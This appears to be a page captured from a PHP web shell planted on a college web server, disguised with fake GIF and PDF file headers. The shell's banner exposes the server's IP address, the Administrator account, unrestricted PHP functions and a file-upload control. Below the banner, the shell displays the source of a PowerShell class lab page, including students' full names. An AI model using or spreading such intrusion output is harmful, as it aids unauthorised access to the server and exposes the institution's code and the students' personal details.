GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/nginx/html/JimMartinson/CST1861/Labs/Labx10x/ |
Upload File : |
<? // JimMartinson/CST1861/Labs/Lab03/index.php $TRACK = "<b>".basename(__FILE__).'</b> <span class="pv_fl">('.__FILE__.")</span>\n<ol>\n"; ini_set('include_path',ini_get('include_path').PATH_SEPARATOR.$_SERVER['DOCUMENT_ROOT']."/"); // Add the DOCUMENT_ROOT to the include_path. require('application.phpinc'); require('Gradebook/EvaluationSubmission_BEGIN.phpinc'); // Replaced. $disabled = ''; //$disabled = ' disabled'; // Comment this line to enable lab. if ( false && $disabled && $_SESSION['userId'] == 1 ) { d_Var('$classId',$classId,'d'); d_Var('$classNumber',$classNumber,'d'); d_Var('$classSection',$classSection,'d'); d_Var('$courseNumber',$courseNumber,'d'); d_Var('$evaluationId',$evaluationId,'d'); d_Var('$evaluationInfo',$evaluationInfo,'d'); d_Var('$evaluationName',$evaluationName,'d'); d_Var('$evaluationNumber',$evaluationNumber,'d'); d_Var('$evaluationTitle',$evaluationTitle,'d'); d_Var('$evaluationType',$evaluationType,'d'); d_Var('$saveFilename',$saveFilename,'d'); d_Var('$title',$title,'d'); d_Var('$uploadFilename',$uploadFilename,'d'); d_Var('$userFileName',$userFileName,'d'); d_Var('$userFirstName',$userFirstName,'d'); d_Var('$userId',$userId,'d'); d_Var('$userFullName',$userFullName,'d'); d_Var('$userLastName',$userLastName,'d'); } ?> <style type="text/css">b {white-space:nowrap;}</style> <p> <fieldset><legend><?=$evaluationType?> <?=$evaluationNumber?> Assignment</legend> <? if ( $disabled ) { ?> <span class="error bold">Notice: Do not perform this assignment unless this notice has been removed.</span><br> <? } ?> The purpose of this lab is to demonstrate a favorite powershell script you have found an share it with the class. <br><?=$gradeNote?> <ol class="count"> <li> Create a directory called <b><?=$evaluationName?></b>. We will use it for all work performed in this lab. </li> <li> Find a favorite powershell script you would like to share with the class. <span class="note">You can even write your own!</span> </li> <li>Schedule a day you would like to demo the script to the class. You can email me, call me, or let me know durring class. <br><span class="note">The maximum number of students I will allow to demo per day is <b>five</b> (5).</span> <table> <tr><th colspan="2" class="center">Currently scheduled demo's:</th></tr> <tr><th>Day and date</th><th>Students</th></tr> <tr><td class="right past">Tuesday, November 22nd</td><td class="past">Garrett Wiley., Adam Miller., Ryan Ragan., and Allison Ragan.</td></tr> <tr><td class="right past">Tuesday, November 29th</td><td class="past"></td></tr> <tr><td class="right past">Thursday, December 1st</td><td class="past">Roc Lescala., Carl Nolan., Mitchell Schroeder, Alec Nelson., Dalton Orr., Mitch Wraspir.</td></tr> <tr><td class="right past">Tuesday, December 6th</td><td class="past">Jordan Lee, James Hang</td></tr> <tr><td class="right past">Thursday, December 8th</td><td class="past">Daniel Rodriguez, Jaysheri Mueller, Gerardo Ramirez</td></tr> </table> </li> <li>Turn in your assignment: <ol type="a"> <li>Copy your favorite script file into your <b><?=$evaluationName?></b> folder.</li> <li>Make sure the following files are in your <b><?=$evaluationName?></b> folder: <ol type="a"> <li>Your favorite script file.</li> </ol> </li> <li>Zip up your <b><?=$evaluationName?></b> folder into a file named <b><?=$uploadFilename?></b>.</li> <li>Browse and select your <b><?=$uploadFilename?></b> file: <input type="file" name="fileUpload" id="inpFileUpload"<?=$disabled?>><div id="divFileploadError"></div></li> <li>Then <input type="submit" name="f_subtask" id="inpSubmit" value="Submit"<?=$disabled?>> for grading.<? if ( $disabled ) { ?> <span class="error bold">Notice: Do not perform this assignment unless this notice has been removed.</span><? } ?></li> </ol> </li> </ol> <?=$gradeNote?> </fieldset> <? $PartialGradingCriteria = ' <table> <tr> <th>Criteria</th> <th class="right">Points</th> </tr> <tr> <td>Script turned in.</td> <td class="number">4</td> </tr> <tr> <td>Script is interesting.</td> <td class="number">1</td> </tr> <tr> <td>Script demonstrated to the class.</td> <td class="number">5</td> </tr> <tr> <th class="right">Total:</th> <th class="number">assignmentPoints</th> </tr> </table> ';require('Gradebook/EvaluationSubmission_END.phpinc'); // Replaced. if ($TRACK != '') $_SESSION['TRACK'] .= "<li>End ".basename(__FILE__)."</ol>\n"; ?>